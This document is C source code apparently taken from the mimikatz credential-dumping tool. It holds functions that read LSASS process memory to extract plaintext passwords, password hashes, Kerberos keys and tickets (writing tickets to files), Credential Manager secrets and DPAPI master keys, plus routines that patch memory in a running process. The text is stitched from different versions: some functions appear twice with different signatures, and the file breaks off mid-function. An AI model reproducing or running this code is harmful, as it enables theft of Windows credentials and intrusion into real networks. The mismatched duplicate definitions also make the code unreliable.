void kuhl_m_sekurlsa_kerberos_createExternalName(PKERB_EXTERNAL_NAME *pExternalName, PKULL_M_MEMORY_HANDLE hLSASS)
{
BOOL status = FALSE;
KERB_EXTERNAL_NAME extName;
PKERB_EXTERNAL_NAME pTempName;
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aName = {*pExternalName, hLSASS}, aLocalBuffer = {&extName, &hBuffer};//, aLocalStrings = {NULL, &hBuffer};
DWORD i;
if(aName.address)
{
*pExternalName = NULL;
if(kull_m_memory_copy(&aLocalBuffer, &aName, sizeof(KERB_EXTERNAL_NAME) - sizeof(UNICODE_STRING)))
{
i = sizeof(KERB_EXTERNAL_NAME) + (sizeof(UNICODE_STRING) * (extName.NameCount - 1));
if(pTempName = (PKERB_EXTERNAL_NAME) LocalAlloc(LPTR, i))
{
*pExternalName = pTempName;
aLocalBuffer.address = pTempName;
if(status = kull_m_memory_copy(&aLocalBuffer, &aName, i))
for(i = 0; status && (i < pTempName->NameCount); i++)
status = kull_m_string_getUnicodeString(&pTempName->Names[i], hLSASS);
}
}
}
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
{
KIWI_TS_CREDENTIAL credentials;
KIWI_TS_PRIMARY_CREDENTIAL primaryCredential;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, cLsass->hLsassMem};
PVOID buffer = NULL;
if(kuhl_m_sekurlsa_tspkg_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_tspkg_package.Module, TsPkgReferences, sizeof(TsPkgReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &TSGlobalCredTable, NULL, NULL))
{
aLsassMemory.address = TSGlobalCredTable;
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromAVLByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), logId))
{
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_TS_CREDENTIAL)))
{
if(aLsassMemory.address = credentials.pTsPrimary)
{
aLocalMemory.address = &primaryCredential;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_TS_PRIMARY_CREDENTIAL)))
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, logId, KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN, externalCallback, externalCallbackData);
}
}
}
} else kprintf(L"KO");
}
BOOL kull_m_process_ntheaders(PKULL_M_MEMORY_ADDRESS pBase, PIMAGE_NT_HEADERS * pHeaders)
{
BOOL status = FALSE;
IMAGE_DOS_HEADER headerImageDos;
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aBuffer = {&headerImageDos, &hBuffer}, aRealNtHeaders = {NULL, &hBuffer}, aProcess= {NULL, pBase->hMemory};
DWORD size;
if(kull_m_memory_copy(&aBuffer, pBase, sizeof(IMAGE_DOS_HEADER)) && headerImageDos.e_magic == IMAGE_DOS_SIGNATURE)
{
aProcess.address = (PBYTE) pBase->address + headerImageDos.e_lfanew;
if(aBuffer.address = LocalAlloc(LPTR, sizeof(DWORD) + IMAGE_SIZEOF_FILE_HEADER))
{
if(kull_m_memory_copy(&aBuffer, &aProcess, sizeof(DWORD) + IMAGE_SIZEOF_FILE_HEADER) && ((PIMAGE_NT_HEADERS) aBuffer.address)->Signature == IMAGE_NT_SIGNATURE);
{
size = (((PIMAGE_NT_HEADERS) aBuffer.address)->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) ? sizeof(IMAGE_NT_HEADERS32) : sizeof(IMAGE_NT_HEADERS64);
if(aRealNtHeaders.address = (PIMAGE_NT_HEADERS) LocalAlloc(LPTR, size))
{
status = kull_m_memory_copy(&aRealNtHeaders, &aProcess, size);
if(status)
*pHeaders = (PIMAGE_NT_HEADERS) aRealNtHeaders.address;
else
LocalFree(aRealNtHeaders.address);
}
}
LocalFree(aBuffer.address);
}
}
return status;
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_TS_CREDENTIAL credentials;
KIWI_TS_PRIMARY_CREDENTIAL primaryCredential;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
PVOID buffer = NULL;
if(kuhl_m_sekurlsa_tspkg_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_tspkg_package.Module, TsPkgReferences, ARRAYSIZE(TsPkgReferences), (PVOID *) &TSGlobalCredTable, NULL, NULL))
{
aLsassMemory.address = TSGlobalCredTable;
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromAVLByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), pData->LogonId))
{
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_TS_CREDENTIAL)))
{
if(aLsassMemory.address = credentials.pTsPrimary)
{
aLocalMemory.address = &primaryCredential;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_TS_PRIMARY_CREDENTIAL)))
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN);
}
}
}
} else kprintf(L"KO");
}
VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID pCredentials, IN PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK credCallback, IN PVOID optionalData)
{
KIWI_MSV1_0_CREDENTIALS credentials;
KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {pCredentials, cLsass->hLsassMem};
while(aLsassMemory.address)
{
aLocalMemory.address = &credentials;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_CREDENTIALS)))
{
aLsassMemory.address = credentials.PrimaryCredentials;
while(aLsassMemory.address)
{
aLocalMemory.address = &primaryCredentials;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)))
{
aLsassMemory.address = primaryCredentials.Credentials.Buffer;
if(kull_m_string_getUnicodeString(&primaryCredentials.Credentials, cLsass->hLsassMem))
{
if(kull_m_string_getUnicodeString((PUNICODE_STRING) &primaryCredentials.Primary, cLsass->hLsassMem))
{
credCallback(&primaryCredentials, credentials.AuthenticationPackageId, &aLsassMemory, optionalData);
LocalFree(primaryCredentials.Primary.Buffer);
}
LocalFree(primaryCredentials.Credentials.Buffer);
}
} else kprintf(L"n.e. (KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)");
aLsassMemory.address = primaryCredentials.next;
}
aLsassMemory.address = credentials.next;
} else kprintf(L"n.e. (KIWI_MSV1_0_CREDENTIALS KO)");
}
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials;
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsass = {NULL, pData->cLsass->hLsassMem};
ULONG monNb = 0;
if(kuhl_m_sekurlsa_ssp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_ssp_package.Module, SspReferences, ARRAYSIZE(SspReferences), (PVOID *) &SspCredentialList, NULL, NULL, NULL))
{
aLsass.address = SspCredentialList;
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(LIST_ENTRY)))
{
aLsass.address = mesCredentials.Flink;
while(aLsass.address != SspCredentialList)
{
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY)))
{
if(SecEqualLuid(pData->LogonId, &mesCredentials.LogonId) && (mesCredentials.credentials.UserName.Buffer || mesCredentials.credentials.Domaine.Buffer || mesCredentials.credentials.Password.Buffer))
{
kprintf(L"\n\t [%08x]", monNb++);
kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, pData, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN);
}
aLsass.address = mesCredentials.Flink;
}
else break;
}
}
} else kprintf(L"KO");
}
PVOID kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(PKULL_M_MEMORY_ADDRESS pSecurityStruct, ULONG LUIDoffset, PLUID luidToFind)
{
PVOID resultat = NULL, pStruct;
KULL_M_MEMORY_ADDRESS data = {&pStruct, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
if(aBuffer.address = LocalAlloc(LPTR, LUIDoffset + sizeof(LUID)))
{
if(kull_m_memory_copy(&data, pSecurityStruct, sizeof(PVOID)))
{
data.address = pStruct;
data.hMemory = pSecurityStruct->hMemory;
while(data.address != pSecurityStruct->address)
{
if(kull_m_memory_copy(&aBuffer, &data, LUIDoffset + sizeof(LUID)))
{
if(SecEqualLuid(luidToFind, (PLUID) ((PBYTE)(aBuffer.address) + LUIDoffset)))
{
resultat = data.address;
break;
}
data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink;
}
else break;
}
}
LocalFree(aBuffer.address);
}
return resultat;
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
{
KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials;
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hBuffer}, aLsass = {NULL, cLsass->hLsassMem};
ULONG monNb = 0;
if(kuhl_m_sekurlsa_ssp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_ssp_package.Module, SspReferences, sizeof(SspReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &SspCredentialList, NULL, NULL))
{
aLsass.address = SspCredentialList;
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(LIST_ENTRY)))
{
aLsass.address = mesCredentials.Flink;
while(aLsass.address != SspCredentialList)
{
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY)))
{
if(RtlEqualLuid(logId, &mesCredentials.LogonId))
{
kprintf(L"\n\t [%08x]", monNb++);
kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, logId, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN, externalCallback, externalCallbackData);
}
aLsass.address = mesCredentials.Flink;
}
else break;
}
}
} else kprintf(L"KO");
}
PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(PKULL_M_MEMORY_ADDRESS pTable, ULONG LUIDoffset, PLUID luidToFind)
{
PVOID resultat = NULL;
RTL_AVL_TABLE maTable;
KULL_M_MEMORY_ADDRESS data = {&maTable, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
if(kull_m_memory_copy(&data, pTable, sizeof(RTL_AVL_TABLE)))
{
if(pTable->address = maTable.OrderedPointer)
{
if(data.address = LocalAlloc(LPTR, LUIDoffset + sizeof(LUID)))
{
if(kull_m_memory_copy(&data, pTable, LUIDoffset + sizeof(LUID)))
{
if(SecEqualLuid(luidToFind, (PLUID) ((PBYTE) (data.address) + LUIDoffset)))
resultat = maTable.OrderedPointer;
}
LocalFree(data.address);
}
}
if(!resultat && (pTable->address = maTable.BalancedRoot.LeftChild))
resultat = kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(pTable, LUIDoffset, luidToFind);
if(!resultat && (pTable->address = maTable.BalancedRoot.RightChild))
resultat = kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(pTable, LUIDoffset, luidToFind);
}
return resultat;
}
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
{
DWORD i, nbHash;
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = {NULL, Localkerbsession.hMemory}, aLocalHashMemory = {NULL, Localkerbsession.hMemory};
if(RemoteLocalKerbSession.address = *(PVOID *) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
{
kuhl_m_sekurlsa_printinfos_logonData(pData);
kuhl_m_sekurlsa_enum_kerberos_callback_passwords(pData, Localkerbsession, RemoteLocalKerbSession, NULL);
kprintf(L"\n\t * Key List :\n");
if(aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize))
{
if(kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
{
if(nbHash = ((DWORD *)(aLocalKeyMemory.address))[1])
{
RemoteLocalKerbSession.address = (PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
i = nbHash * (DWORD) kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
if(aLocalHashMemory.address = LocalAlloc(LPTR, i))
{
if(kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i))
for(i = 0; i < nbHash; i++)
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric), pData, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10)));
LocalFree(aLocalHashMemory.address);
}
}
}
LocalFree(aLocalKeyMemory.address);
}
}
}
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
{
KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
PBYTE infosCsp;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {*(PVOID *) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetSmartCard), pData->cLsass->hLsassMem};
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData, (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10);
if(aLsassMemory.address)
{
if(infosCsp = (PBYTE) LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structCspInfosSize))
{
aLocalMemory.address = infosCsp;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, kerbHelper[KerbOffsetIndex].structCspInfosSize))
{
creds.UserName = *(PUNICODE_STRING) infosCsp;
if(kerbHelper[KerbOffsetIndex].offsetNames && kerbHelper[KerbOffsetIndex].offsetSizeOfCurrentStruct)
{
creds.Domaine.Length = (USHORT) (*(PDWORD) (infosCsp + kerbHelper[KerbOffsetIndex].offsetSizeOfCurrentStruct) - (kerbHelper[KerbOffsetIndex].offsetNames - kerbHelper[KerbOffsetIndex].offsetSizeOfCurrentStruct));
if(creds.Domaine.Buffer = (PWSTR) LocalAlloc(LPTR, creds.Domaine.Length))
{
aLsassMemory.address = (PBYTE) aLsassMemory.address + kerbHelper[KerbOffsetIndex].offsetNames;
aLocalMemory.address = creds.Domaine.Buffer;
kull_m_memory_copy(&aLocalMemory, &aLsassMemory, creds.Domaine.Length);
}
}
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_2K3) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0));
if(creds.Domaine.Buffer)
LocalFree(creds.Domaine.Buffer);
}
LocalFree(infosCsp);
}
}
}
void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN DWORD grp, IN PVOID tickets, IN BOOL isFile)
{
PVOID pStruct, pRef = tickets;
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS data = {&pStruct, &hBuffer}, aTicket = {NULL, &hBuffer}, aLsassBuffer = {tickets, pData->cLsass->hLsassMem};
DWORD nbTickets = 0;
PKIWI_KERBEROS_TICKET pKiwiTicket;
PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred;
BOOL isNormalSessionKey;
wchar_t * filename;
if(aTicket.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structTicketSize))
{
if(kull_m_memory_copy(&data, &aLsassBuffer, sizeof(PVOID)))
{
data.address = pStruct;
data.hMemory = pData->cLsass->hLsassMem;
while(data.address != pRef)
{
if(kull_m_memory_copy(&aTicket, &data, kerbHelper[KerbOffsetIndex].structTicketSize))
{
kprintf(L"\n\t [%08x]", nbTickets);
if(pKiwiTicket = kuhl_m_sekurlsa_kerberos_createTicket((LPBYTE) aTicket.address, pData->cLsass->hLsassMem))
{
isNormalSessionKey = (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) || (pKiwiTicket->Key.Length < (ULONG) FIELD_OFFSET(LSAISO_DATA_BLOB, data));
kuhl_m_kerberos_ticket_display(pKiwiTicket, isNormalSessionKey, FALSE);
if(isFile)
if(filename = kuhl_m_sekurlsa_kerberos_generateFileName(pData->LogonId, grp, nbTickets, pKiwiTicket, MIMIKATZ_KERBEROS_EXT))
{
if(App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(pKiwiTicket, FALSE))
{
if(kull_m_file_writeData(filename, App_KrbCred, kull_m_asn1_getSize(App_KrbCred)))
kprintf(L"\n\t * Saved to file %s !", filename);
else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
LocalFree(App_KrbCred);
}
LocalFree(filename);
}
if(!isNormalSessionKey)
{
kprintf(L"\n\t LSA Session Key : 0x%08x - %s", pKiwiTicket->KeyType, kuhl_m_kerberos_ticket_etype(pKiwiTicket->KeyType));
kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) pKiwiTicket->Key.Value);
}
kuhl_m_kerberos_ticket_freeTicket(pKiwiTicket);
}
data.address = ((PLIST_ENTRY) (aTicket.address))->Flink;
}
else break;
nbTickets++;
}
}
LocalFree(aTicket.address);
}
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_CREDMAN_SET_LIST_ENTRY setList;
KIWI_CREDMAN_LIST_STARTER listStarter;
DWORD nbCred = 0;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLocalMemory = {&setList, &hLocalMemory}, aLsassMemory = {pData->pCredentialManager, pData->cLsass->hLsassMem};
PVOID pRef;
KIWI_GENERIC_PRIMARY_CREDENTIAL kiwiCreds;
ULONG CredOffsetIndex;
if(pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA)
CredOffsetIndex = 0;
else if(pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_7)
CredOffsetIndex = 1;
else
CredOffsetIndex = 2;
if(aLsassMemory.address)
{
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CREDMAN_SET_LIST_ENTRY)))
{
aLocalMemory.address = &listStarter;
if(aLsassMemory.address = setList.list1)
{
pRef = (PBYTE) setList.list1 + FIELD_OFFSET(KIWI_CREDMAN_LIST_STARTER, start);
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CREDMAN_LIST_STARTER)))
{
if(aLocalMemory.address = LocalAlloc(LPTR, credhelper[CredOffsetIndex].structSize))
{
if(aLsassMemory.address = listStarter.start)
{
while(aLsassMemory.address != pRef)
{
aLsassMemory.address = (PBYTE) aLsassMemory.address - credhelper[CredOffsetIndex].offsetFLink;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, credhelper[CredOffsetIndex].structSize))
{
kprintf(L"\n\t [%08x]", nbCred);
kiwiCreds.UserName = *(PUNICODE_STRING) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetUsername);
kiwiCreds.Domaine = *(PUNICODE_STRING) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetDomain);
kiwiCreds.Password.Length = kiwiCreds.Password.MaximumLength = *(PUSHORT) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetCbPassword);;
kiwiCreds.Password.Buffer = *(PWSTR *) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetPassword);
kuhl_m_sekurlsa_genericCredsOutput(&kiwiCreds, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS);
aLsassMemory.address = *(PVOID *) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetFLink);
}
else break;
nbCred++;
}
}
LocalFree(aLocalMemory.address);
}
}
}
}
}
}
PBYTE kuhl_m_misc_detours_testHookDestination(PKULL_M_MEMORY_ADDRESS base, WORD machineOfProcess, DWORD level)
{
PBYTE dst = NULL;
BYTE bufferJmp[] = {0xe9}, bufferJmpOff[] = {0xff, 0x25}, bufferRetSS[] = {0x50, 0x48, 0xb8};
KUHL_M_MISC_DETOURS_HOOKS myHooks[] = {
{0, bufferJmp, sizeof(bufferJmp), sizeof(bufferJmp), sizeof(LONG), TRUE, FALSE},
{1, bufferJmpOff, sizeof(bufferJmpOff), sizeof(bufferJmpOff), sizeof(LONG), !(machineOfProcess == IMAGE_FILE_MACHINE_I386), TRUE},
{0, bufferRetSS, sizeof(bufferRetSS), sizeof(bufferRetSS), sizeof(PVOID), FALSE, FALSE},
};
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &hBuffer}, dBuffer = {&dst, &hBuffer};
KULL_M_MEMORY_ADDRESS pBuffer = *base;
DWORD i, sizeToRead;
for(i = 0; !dst && (i < sizeof(myHooks) / sizeof(KUHL_M_MISC_DETOURS_HOOKS)); i++)
{
if(level >= myHooks[i].minLevel)
{
sizeToRead = myHooks[i].offsetToRead + myHooks[i].szToRead;
if(aBuffer.address = LocalAlloc(LPTR, sizeToRead))
{
if(kull_m_memory_copy(&aBuffer, base, sizeToRead))
{
if(RtlEqualMemory(myHooks[i].pattern, aBuffer.address, myHooks[i].szPattern))
{
if(myHooks[i].isRelative)
{
dst = (PBYTE) pBuffer.address + sizeToRead + *(PLONG) ((PBYTE) aBuffer.address + myHooks[i].offsetToRead);
}
else
{
dst = *(PBYTE *) ((PBYTE) aBuffer.address + myHooks[i].offsetToRead);
#ifdef _M_X64
if(machineOfProcess == IMAGE_FILE_MACHINE_I386)
dst = (PBYTE) ((ULONG_PTR) dst & 0xffffffff);
#endif
}
if(myHooks[i].isTarget)
{
pBuffer.address = dst;
kull_m_memory_copy(&dBuffer, &pBuffer, sizeof(PBYTE));
#ifdef _M_X64
if(machineOfProcess == IMAGE_FILE_MACHINE_I386)
dst = (PBYTE) ((ULONG_PTR) dst & 0xffffffff);
#endif
}
}
}
LocalFree(aBuffer.address);
}
}
}
return dst;
}
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
{
KIWI_MASTERKEY_CACHE_ENTRY mesCredentials;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hLocalMemory}, aKey = {NULL, &hLocalMemory}, aLsass = {NULL, pData->cLsass->hLsassMem};
PKUHL_M_SEKURLSA_PACKAGE pPackage = (pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package;
BYTE dgst[SHA_DIGEST_LENGTH];
DWORD monNb = 0;
if(pData->LogonType != Network)
{
kuhl_m_sekurlsa_printinfos_logonData(pData);
if(pPackage->Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &pPackage->Module, MasterKeyCacheReferences, ARRAYSIZE(MasterKeyCacheReferences), (PVOID *) &pMasterKeyCacheList, NULL, NULL, NULL))
{
aLsass.address = pMasterKeyCacheList;
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(LIST_ENTRY)))
{
aLsass.address = mesCredentials.Flink;
while(aLsass.address != pMasterKeyCacheList)
{
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_MASTERKEY_CACHE_ENTRY)))
{
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
{
kprintf(L"\t [%08x]\n\t * GUID :\t", monNb++);
kull_m_string_displayGUID(&mesCredentials.KeyUid);
kprintf(L"\n\t * Time :\t"); kull_m_string_displayLocalFileTime(&mesCredentials.insertTime);
if(aKey.address = LocalAlloc(LPTR, mesCredentials.keySize))
{
aLsass.address = (PBYTE) aLsass.address + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key);
if(kull_m_memory_copy(&aKey, &aLsass, mesCredentials.keySize))
{
(*pData->lsassLocalHelper->pLsaUnprotectMemory)(aKey.address, mesCredentials.keySize);
kprintf(L"\n\t * MasterKey :\t"); kull_m_string_wprintf_hex(aKey.address, mesCredentials.keySize, 0);
if(kull_m_crypto_hash(CALG_SHA1, aKey.address, mesCredentials.keySize, dgst, SHA_DIGEST_LENGTH))
{
kprintf(L"\n\t * sha1(key) :\t"); kull_m_string_wprintf_hex(dgst, SHA_DIGEST_LENGTH, 0);
kuhl_m_dpapi_oe_masterkey_add(&mesCredentials.KeyUid, dgst, SHA_DIGEST_LENGTH);
}
}
LocalFree(aKey.address);
}
kprintf(L"\n");
}
aLsass.address = mesCredentials.Flink;
}
else break;
}
}
} else kprintf(L"\n\tKO");
kprintf(L"\n");
}
return TRUE;
}
BOOL kull_m_patch(PKULL_M_MEMORY_SEARCH sMemory, PKULL_M_MEMORY_ADDRESS pPattern, SIZE_T szPattern, PKULL_M_MEMORY_ADDRESS pPatch, SIZE_T szPatch, LONG offsetOfPatch, PKULL_M_PATCH_CALLBACK pCallBackBeforeRestore, int argc, wchar_t * args[], NTSTATUS * pRetCallBack)
{
BOOL result = FALSE, resultBackup = !pCallBackBeforeRestore, resultProtect = TRUE;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS destination = {NULL, sMemory->kull_m_memoryRange.kull_m_memoryAdress.hMemory};
KULL_M_MEMORY_ADDRESS backup = {NULL, &hLocalMemory};
MEMORY_BASIC_INFORMATION readInfos;
NTSTATUS status;
DWORD flags, oldProtect = 0, tempProtect = 0;
if(kull_m_memory_search(pPattern, szPattern, sMemory, TRUE))
{
destination.address = (LPBYTE) sMemory->result + offsetOfPatch;
if(!resultBackup)
if(backup.address = LocalAlloc(LPTR, szPatch))
resultBackup = kull_m_memory_copy(&backup, &destination, szPatch);
if(resultBackup)
{
if(kull_m_memory_query(&destination, &readInfos))
{
flags = readInfos.Protect & ~0xff;
if((readInfos.Protect & 0x0f) && ((readInfos.Protect & 0x0f) < PAGE_READWRITE))
tempProtect = PAGE_READWRITE;
